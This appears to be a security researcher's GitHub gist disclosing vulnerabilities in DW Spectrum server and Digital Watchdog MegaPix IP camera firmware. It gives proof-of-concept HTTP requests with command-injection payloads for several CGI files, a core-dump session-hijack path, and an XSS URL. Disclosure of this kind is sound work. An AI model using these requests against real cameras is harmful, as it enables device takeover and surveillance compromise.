Skip to content

Instantly share code, notes, and snippets.

@secgrant
Last active June 28, 2022 17:31
Show Gist options
  • Save secgrant/820faeeaa0cb4889edaa1d6fef83deab to your computer and use it in GitHub Desktop.
Save secgrant/820faeeaa0cb4889edaa1d6fef83deab to your computer and use it in GitHub Desktop.
The following issue was found on DW Spectrum server software ver 4.2.0.32842
Information Disclosure:
1. API call displays internal paths, IPs, OS version and architecture.
http://<SERVER IP>:7001/api/moduleInformation
All issues below were found on A7.2.2_20211029 firmware of MegaPix IP Camera by Digital Watchdog.
The following issues were found through unauthenticated URLs:
Information Disclosure:
1. Web files display internal paths and scripts, software versions (CWE-201)
http://192.168.1.80/plugin_info_list.xml
http://192.168.1.80/plugin/plugin_web.conf
http://192.168.1.80/plugin/port.conf
2. Information disclosure and session hijacking through core log (CWE-201)
Step 1. generate 500 error from authenticated by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action
Step 2. get core file by going to 192.168.1.80/cgi-bin/core
Step 3. Use session token information from error event to log into admin pages
The following issues were found through authenticated URLs:
1. Command injection on curltest.cgi web file
http://192.168.1.80/cgi-bin/admin/curltest.cgi
-injectable on test[] parameters smtp_addr,smtp_port,sender,receiver,id, and pass
POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1
Host: 192.168.1.80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 299
Origin: http://192.168.1.80
Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7"
Connection: close
Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi
test%5Benabled%5D=1&test%5Bsmtp_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi
2. Command injection on adacph.cgi web file (CWE-94)
http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi
-injectable on event, id, pluginname, name, and evt_id paramaters
GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt_id=a
3. Command injection on license_tok.cgi web file (CWE-94)
http://192.168.1.80/cgi-bin/admin/vca/license/license_tok.cgi
-injectable on POST guid,license_value, and plugin_info parameters
POST /cgi-bin/admin/vca/license/license_tok.cgi?getToken HTTP/1.1
Host: 192.168.1.80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: http://192.168.1.80
Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476"
Connection: close
Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi
guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license_value='fff'
4. XSS vulnerability in bia_oneshot.cgi web file (CWE-79)
http://192.168.1.80/cgi-bin/admin/vca/bia/bia_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E
-file contents injection allows persistent XSS through blob parameter
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment